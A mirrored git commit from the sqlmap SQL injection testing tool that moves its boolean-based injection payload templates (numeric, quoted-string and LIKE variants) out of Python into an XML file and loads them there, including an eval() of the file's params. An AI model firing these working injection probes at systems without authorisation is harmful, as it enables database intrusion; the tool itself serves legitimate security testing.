mirror of
https://github.com/sqlmapproject/sqlmap.git
synced 2024-11-22 09:36:35 +03:00
moved injections to xml format
This commit is contained in:
parent
d9d0c971fa
commit
de6fa1247b
|
@ -22,10 +22,13 @@ with sqlmap; if not, write to the Free Software Foundation, Inc., 51
|
|||
Franklin St, Fifth Floor, Boston, MA 02110-1301 USA
|
||||
"""
|
||||
|
||||
import codecs
|
||||
import re
|
||||
import socket
|
||||
import time
|
||||
|
||||
from xml.dom import minidom
|
||||
|
||||
from lib.core.agent import agent
|
||||
from lib.core.common import getUnicode
|
||||
from lib.core.common import preparePageForLineComparison
|
||||
|
@ -36,6 +39,7 @@ from lib.core.convert import md5hash
|
|||
from lib.core.data import conf
|
||||
from lib.core.data import kb
|
||||
from lib.core.data import logger
|
||||
from lib.core.data import paths
|
||||
from lib.core.exception import sqlmapConnectionException
|
||||
from lib.core.exception import sqlmapNoneDataException
|
||||
from lib.core.session import setString
|
||||
|
@ -55,197 +59,53 @@ def checkSqlInjection(place, parameter, value, parenthesis):
|
|||
|
||||
randInt = randomInt()
|
||||
randStr = randomStr()
|
||||
prefix = ""
|
||||
postfix = ""
|
||||
|
||||
if conf.prefix or conf.postfix:
|
||||
prefix = ""
|
||||
postfix = ""
|
||||
|
||||
if conf.prefix:
|
||||
prefix = conf.prefix
|
||||
|
||||
if conf.postfix:
|
||||
postfix = conf.postfix
|
||||
|
||||
infoMsg = "testing custom injection "
|
||||
f = codecs.open(paths.INJECTIONS_XML, 'r', conf.dataEncoding)
|
||||
injections = minidom.parse(f).documentElement
|
||||
f.close()
|
||||
|
||||
for case in injections.getElementsByTagName("case"):
|
||||
tag = case.getAttribute("tag")
|
||||
desc = case.getAttribute("desc")
|
||||
|
||||
infoMsg = "testing %s injection " % desc
|
||||
infoMsg += "on %s parameter '%s'" % (place, parameter)
|
||||
logger.info(infoMsg)
|
||||
|
||||
payload = agent.payload(place, parameter, value, "%s%s%s AND %s%d=%d %s" % (value, prefix, ")" * parenthesis, "(" * parenthesis, randInt, randInt, postfix))
|
||||
positive = case.getElementsByTagName("positive")[0]
|
||||
negative = case.getElementsByTagName("negative")[0]
|
||||
|
||||
params = positive.getAttribute("params")
|
||||
format = positive.getAttribute("format")
|
||||
|
||||
if not prefix and not postfix and tag == "custom":
|
||||
continue
|
||||
|
||||
payload = agent.payload(place, parameter, value, format % eval(params))
|
||||
|
||||
trueResult = Request.queryPage(payload, place)
|
||||
|
||||
if trueResult:
|
||||
payload = agent.payload(place, parameter, value, "%s%s%s AND %s%d=%d %s" % (value, prefix, ")" * parenthesis, "(" * parenthesis, randInt, randInt + 1, postfix))
|
||||
params = negative.getAttribute("params")
|
||||
format = negative.getAttribute("format")
|
||||
payload = agent.payload(place, parameter, value, format % eval(params))
|
||||
|
||||
falseResult = Request.queryPage(payload, place)
|
||||
|
||||
if not falseResult:
|
||||
infoMsg = "confirming custom injection "
|
||||
infoMsg += "on %s parameter '%s'" % (place, parameter)
|
||||
logger.info(infoMsg)
|
||||
|
||||
payload = agent.payload(place, parameter, value, "%s%s%s AND %s%s %s" % (value, prefix, ")" * parenthesis, "(" * parenthesis, randStr, postfix))
|
||||
falseResult = Request.queryPage(payload, place)
|
||||
|
||||
if not falseResult:
|
||||
infoMsg = "%s parameter '%s' is " % (place, parameter)
|
||||
infoMsg += "custom injectable "
|
||||
logger.info(infoMsg)
|
||||
|
||||
return "custom"
|
||||
|
||||
infoMsg = "testing unescaped numeric injection "
|
||||
infoMsg += "on %s parameter '%s'" % (place, parameter)
|
||||
logger.info(infoMsg)
|
||||
|
||||
payload = agent.payload(place, parameter, value, "%s%s AND %s%d=%d" % (value, ")" * parenthesis, "(" * parenthesis, randInt, randInt))
|
||||
trueResult = Request.queryPage(payload, place)
|
||||
|
||||
if trueResult:
|
||||
payload = agent.payload(place, parameter, value, "%s%s AND %s%d=%d" % (value, ")" * parenthesis, "(" * parenthesis, randInt, randInt + 1))
|
||||
falseResult = Request.queryPage(payload, place)
|
||||
|
||||
if not falseResult:
|
||||
infoMsg = "confirming unescaped numeric injection "
|
||||
infoMsg += "on %s parameter '%s'" % (place, parameter)
|
||||
logger.info(infoMsg)
|
||||
|
||||
payload = agent.payload(place, parameter, value, "%s%s AND %s%s" % (value, ")" * parenthesis, "(" * parenthesis, randStr))
|
||||
falseResult = Request.queryPage(payload, place)
|
||||
|
||||
if not falseResult:
|
||||
infoMsg = "%s parameter '%s' is " % (place, parameter)
|
||||
infoMsg += "unescaped numeric injectable "
|
||||
infoMsg = "%s parameter '%s' is %s injectable " % (place, parameter, desc)
|
||||
infoMsg += "with %d parenthesis" % parenthesis
|
||||
logger.info(infoMsg)
|
||||
|
||||
return "numeric"
|
||||
|
||||
infoMsg = "%s parameter '%s' is not " % (place, parameter)
|
||||
infoMsg += "unescaped numeric injectable"
|
||||
logger.info(infoMsg)
|
||||
|
||||
infoMsg = "testing single quoted string injection "
|
||||
infoMsg += "on %s parameter '%s'" % (place, parameter)
|
||||
logger.info(infoMsg)
|
||||
|
||||
payload = agent.payload(place, parameter, value, "%s'%s AND %s'%s'='%s" % (value, ")" * parenthesis, "(" * parenthesis, randStr, randStr))
|
||||
trueResult = Request.queryPage(payload, place)
|
||||
|
||||
if trueResult:
|
||||
payload = agent.payload(place, parameter, value, "%s'%s AND %s'%s'='%s" % (value, ")" * parenthesis, "(" * parenthesis, randStr, randStr + randomStr(1)))
|
||||
falseResult = Request.queryPage(payload, place)
|
||||
|
||||
if not falseResult:
|
||||
infoMsg = "confirming single quoted string injection "
|
||||
infoMsg += "on %s parameter '%s'" % (place, parameter)
|
||||
logger.info(infoMsg)
|
||||
|
||||
payload = agent.payload(place, parameter, value, "%s'%s and %s%s" % (value, ")" * parenthesis, "(" * parenthesis, randStr))
|
||||
falseResult = Request.queryPage(payload, place)
|
||||
|
||||
if not falseResult:
|
||||
infoMsg = "%s parameter '%s' is " % (place, parameter)
|
||||
infoMsg += "single quoted string injectable "
|
||||
infoMsg += "with %d parenthesis" % parenthesis
|
||||
logger.info(infoMsg)
|
||||
|
||||
return "stringsingle"
|
||||
|
||||
infoMsg = "%s parameter '%s' is not " % (place, parameter)
|
||||
infoMsg += "single quoted string injectable"
|
||||
logger.info(infoMsg)
|
||||
|
||||
infoMsg = "testing LIKE single quoted string injection "
|
||||
infoMsg += "on %s parameter '%s'" % (place, parameter)
|
||||
logger.info(infoMsg)
|
||||
|
||||
payload = agent.payload(place, parameter, value, "%s'%s AND %s'%s' LIKE '%s" % (value, ")" * parenthesis, "(" * parenthesis, randStr, randStr))
|
||||
trueResult = Request.queryPage(payload, place)
|
||||
|
||||
if trueResult:
|
||||
payload = agent.payload(place, parameter, value, "%s'%s AND %s'%s' LIKE '%s" % (value, ")" * parenthesis, "(" * parenthesis, randStr, randStr + randomStr(1)))
|
||||
falseResult = Request.queryPage(payload, place)
|
||||
|
||||
if not falseResult:
|
||||
infoMsg = "confirming LIKE single quoted string injection "
|
||||
infoMsg += "on %s parameter '%s'" % (place, parameter)
|
||||
logger.info(infoMsg)
|
||||
|
||||
payload = agent.payload(place, parameter, value, "%s'%s and %s%s" % (value, ")" * parenthesis, "(" * parenthesis, randStr))
|
||||
falseResult = Request.queryPage(payload, place)
|
||||
|
||||
if not falseResult:
|
||||
infoMsg = "%s parameter '%s' is " % (place, parameter)
|
||||
infoMsg += "LIKE single quoted string injectable "
|
||||
infoMsg += "with %d parenthesis" % parenthesis
|
||||
logger.info(infoMsg)
|
||||
|
||||
return "likesingle"
|
||||
|
||||
infoMsg = "%s parameter '%s' is not " % (place, parameter)
|
||||
infoMsg += "LIKE single quoted string injectable"
|
||||
logger.info(infoMsg)
|
||||
|
||||
infoMsg = "testing double quoted string injection "
|
||||
infoMsg += "on %s parameter '%s'" % (place, parameter)
|
||||
logger.info(infoMsg)
|
||||
|
||||
payload = agent.payload(place, parameter, value, "%s\"%s AND %s\"%s\"=\"%s" % (value, ")" * parenthesis, "(" * parenthesis, randStr, randStr))
|
||||
trueResult = Request.queryPage(payload, place)
|
||||
|
||||
if trueResult:
|
||||
payload = agent.payload(place, parameter, value, "%s\"%s AND %s\"%s\"=\"%s" % (value, ")" * parenthesis, "(" * parenthesis, randStr, randStr + randomStr(1)))
|
||||
falseResult = Request.queryPage(payload, place)
|
||||
|
||||
if not falseResult:
|
||||
infoMsg = "confirming double quoted string injection "
|
||||
infoMsg += "on %s parameter '%s'" % (place, parameter)
|
||||
logger.info(infoMsg)
|
||||
|
||||
payload = agent.payload(place, parameter, value, "%s\"%s AND %s%s" % (value, ")" * parenthesis, "(" * parenthesis, randStr))
|
||||
falseResult = Request.queryPage(payload, place)
|
||||
|
||||
if not falseResult:
|
||||
infoMsg = "%s parameter '%s' is " % (place, parameter)
|
||||
infoMsg += "double quoted string injectable "
|
||||
infoMsg += "with %d parenthesis" % parenthesis
|
||||
logger.info(infoMsg)
|
||||
|
||||
return "stringdouble"
|
||||
|
||||
infoMsg = "%s parameter '%s' is not " % (place, parameter)
|
||||
infoMsg += "double quoted string injectable"
|
||||
logger.info(infoMsg)
|
||||
|
||||
infoMsg = "testing LIKE double quoted string injection "
|
||||
infoMsg += "on %s parameter '%s'" % (place, parameter)
|
||||
logger.info(infoMsg)
|
||||
|
||||
payload = agent.payload(place, parameter, value, "%s\"%s AND %s\"%s\" LIKE \"%s" % (value, ")" * parenthesis, "(" * parenthesis, randStr, randStr))
|
||||
trueResult = Request.queryPage(payload, place)
|
||||
|
||||
if trueResult:
|
||||
payload = agent.payload(place, parameter, value, "%s\"%s AND %s\"%s\" LIKE \"%s" % (value, ")" * parenthesis, "(" * parenthesis, randStr, randStr + randomStr(1)))
|
||||
falseResult = Request.queryPage(payload, place)
|
||||
|
||||
if not falseResult:
|
||||
infoMsg = "confirming LIKE double quoted string injection "
|
||||
infoMsg += "on %s parameter '%s'" % (place, parameter)
|
||||
logger.info(infoMsg)
|
||||
|
||||
payload = agent.payload(place, parameter, value, "%s\"%s and %s%s" % (value, ")" * parenthesis, "(" * parenthesis, randStr))
|
||||
falseResult = Request.queryPage(payload, place)
|
||||
|
||||
if not falseResult:
|
||||
infoMsg = "%s parameter '%s' is " % (place, parameter)
|
||||
infoMsg += "LIKE double quoted string injectable "
|
||||
infoMsg += "with %d parenthesis" % parenthesis
|
||||
logger.info(infoMsg)
|
||||
|
||||
return "likedouble"
|
||||
|
||||
infoMsg = "%s parameter '%s' is not " % (place, parameter)
|
||||
infoMsg += "LIKE double quoted string injectable"
|
||||
logger.info(infoMsg)
|
||||
return tag
|
||||
|
||||
return None
|
||||
|
||||
|
@ -291,10 +151,12 @@ def checkDynamicContent(*pages):
|
|||
for i in xrange(len(pages)):
|
||||
firstPage = pages[i]
|
||||
linesFirst = preparePageForLineComparison(firstPage)
|
||||
pageLinesNumber = len(linesFirst)
|
||||
pageLinesNumber = len(linesFirst)
|
||||
|
||||
for j in xrange(i+1, len(pages)):
|
||||
secondPage = pages[j]
|
||||
linesSecond = preparePageForLineComparison(secondPage)
|
||||
|
||||
if pageLinesNumber == len(linesSecond):
|
||||
for k in xrange(0, pageLinesNumber):
|
||||
if (linesFirst[k] != linesSecond[k]):
|
||||
|
@ -303,6 +165,7 @@ def checkDynamicContent(*pages):
|
|||
linesFirst[k+1] if k < pageLinesNumber - 1 else None)
|
||||
|
||||
found = None
|
||||
|
||||
for other in kb.dynamicContent:
|
||||
found = True
|
||||
if other.pageTotal == item.pageTotal:
|
||||
|
@ -311,18 +174,22 @@ def checkDynamicContent(*pages):
|
|||
other.lineNumber = [other.lineNumber, item.lineNumber]
|
||||
other.lineContentAfter = item.lineContentAfter
|
||||
break
|
||||
|
||||
elif other.lineNumber == item.lineNumber + 1:
|
||||
other.lineNumber = [item.lineNumber, other.lineNumber]
|
||||
other.lineContentBefore = item.lineContentBefore
|
||||
break
|
||||
|
||||
elif item.lineNumber - 1 == other.lineNumber[-1]:
|
||||
other.lineNumber.append(item.lineNumber)
|
||||
other.lineContentAfter = item.lineContentAfter
|
||||
break
|
||||
|
||||
elif item.lineNumber + 1 == other.lineNumber[0]:
|
||||
other.lineNumber.insert(0, item.lineNumber)
|
||||
other.lineContentBefore = item.lineContentBefore
|
||||
break
|
||||
|
||||
found = False
|
||||
|
||||
if not found:
|
||||
|
|
|
@ -662,6 +662,7 @@ def setPaths():
|
|||
paths.FUZZ_VECTORS = os.path.join(paths.SQLMAP_TXT_PATH, "fuzz_vectors.txt")
|
||||
paths.DETECTION_RULES_XML = os.path.join(paths.SQLMAP_XML_PATH, "detection.xml")
|
||||
paths.ERRORS_XML = os.path.join(paths.SQLMAP_XML_PATH, "errors.xml")
|
||||
paths.INJECTIONS_XML = os.path.join(paths.SQLMAP_XML_PATH, "injections.xml")
|
||||
paths.LIVE_TESTS_XML = os.path.join(paths.SQLMAP_XML_PATH, "livetests.xml")
|
||||
paths.QUERIES_XML = os.path.join(paths.SQLMAP_XML_PATH, "queries.xml")
|
||||
paths.GENERIC_XML = os.path.join(paths.SQLMAP_XML_BANNER_PATH, "generic.xml")
|
||||
|
|
|
@ -15,15 +15,14 @@
|
|||
</case>
|
||||
<case tag="likesingle" desc="LIKE single quoted string">
|
||||
<positive format="%s'%s AND %s'%s' LIKE '%s" params="value, ")" * parenthesis, "(" * parenthesis, randStr, randStr"/>
|
||||
<negative format="" params=""/>
|
||||
<negative format="%s'%s AND %s'%s' LIKE '%s" params="value, ")" * parenthesis, "(" * parenthesis, randStr, randStr + randomStr(1)"/>
|
||||
</case>
|
||||
<case tag="custom" desc="custom">
|
||||
<positive format="" params=""/>
|
||||
<negative format="" params=""/>
|
||||
<case tag="stringdouble" desc="double quoted string">
|
||||
<positive format="%s\"%s AND %s\"%s\"=\"%s" params="value, ")" * parenthesis, "(" * parenthesis, randStr, randStr"/>
|
||||
<negative format="%s\"%s AND %s\"%s\"=\"%s" params="value, ")" * parenthesis, "(" * parenthesis, randStr, randStr + randomStr(1)"/>
|
||||
</case>
|
||||
<case tag="custom" desc="custom">
|
||||
<positive format="" params=""/>
|
||||
<negative format="" params=""/>
|
||||
<case tag="likedouble" desc="LIKE double quoted string">
|
||||
<positive format="%s\"%s AND %s\"%s\" LIKE \"%s" params="value, ")" * parenthesis, "(" * parenthesis, randStr, randStr"/>
|
||||
<negative format="%s\"%s AND %s\"%s\" LIKE \"%s" params="value, ")" * parenthesis, "(" * parenthesis, randStr, randStr + randomStr(1)"/>
|
||||
</case>
|
||||
|
||||
</root>
|
Loading…
Reference in New Issue
Block a user